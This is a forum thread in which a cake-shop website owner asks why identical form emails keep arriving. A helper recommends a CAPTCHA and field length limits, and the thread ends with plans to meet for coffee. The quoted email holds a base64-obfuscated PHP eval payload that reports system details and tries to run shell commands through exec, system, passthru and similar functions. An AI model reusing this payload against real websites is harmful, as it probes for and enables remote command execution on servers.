Collapse
X

• Filter
  • Time
  • Show
Clear All

• unknown email repeat....HELP

Hi All,
    I need your help or your opinion. On my website www.trishaliciouscakes.com i have an order page where you can fill out a form with your order and send it and it will show up in my email. In the last two days i`m getting identical messages/mails and it`s really annoying. Please see email below and give me your opinion what is this and how can i stop this or tell me the reasn why am i getting this???
    Thank you in advance!
    Lui.

content:
    Values submitted from web site form:
    Send-contactus : 1
    Author Name :
    PHP Code:
    eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die(); 
    < br></div>

Re: unknown email repeat....HELP

Should have called me! You have my number still, yes?

Immediately install on your Contact Form the CAPTCHA tool to prevent auto-generated scripts that are trying to hack your email functions. This will require human-generated email submissions, as the proper code must be entered first:
    from the BlueVoda toolbar, INSERT > FORM > CAPTCHA
    Of course, making sure the FORM extends and includes all elements inside the FORM borders so it will function properly.

Also be sure you implement simple "rules" for your fields (in each Field's Properties): limit the number of characters in each text field (say 40 for the Name, 35 for the Email Address, 14 for the Telephone, etc.) to better reflect the normal allowance, again to prevent "stuffing" by those bent on compromising your Form or injecting a script of some sort.

Never take for granted the security of your website, planning on preventing any aberrational abuse by Visitors in this devious world ....

EXAMPLE
    . VodaWebs....Luxury Group
    * Success Is Potential Realized *

Comment

Thank you so much for your help!!! Awesome, i just learned a new thing today from you.

I have your number but i didn`t want to call you...i hated the situation we couldn`t even meet and i would call you only when i need help...

I`ll be in Safety Harbor area tomorrow. Do you have time for a coffee?

You can reach me < DELETED FOR SECURITY >

i see my emails on my phone tfl.lajos******.com .....so if you have time, let`s meet and enjoy a coffee with me...if not tomorrow then next week.

Thank you again for your help.

Lajos

Comment

Sure!
        Since you still have my number, give me a call at least an hour beforehand, and I'll meet you at McMullen & Enterprise (Starbucks). Just got out of the hospital yesterday (heart attack), so I'm in the mood to get out and about, especially for some primo caffeine!
        . VodaWebs....Luxury Group
        * Success Is Potential Realized *

Comment

Man....i hope you feel much better...i just read your message...i`m sorry.
          My day was a cluster...i`ll be there again on Monday and we will have a coffee...a primo one!!!! and it`s on me

9:30 in the morning would be good for you? Mc Mullen Starbucks?

Is coffe good for you after a heart attack?

Get well and rest a lot.

I hope i`ll see you on Monday...

L.

Comment

Working...
          X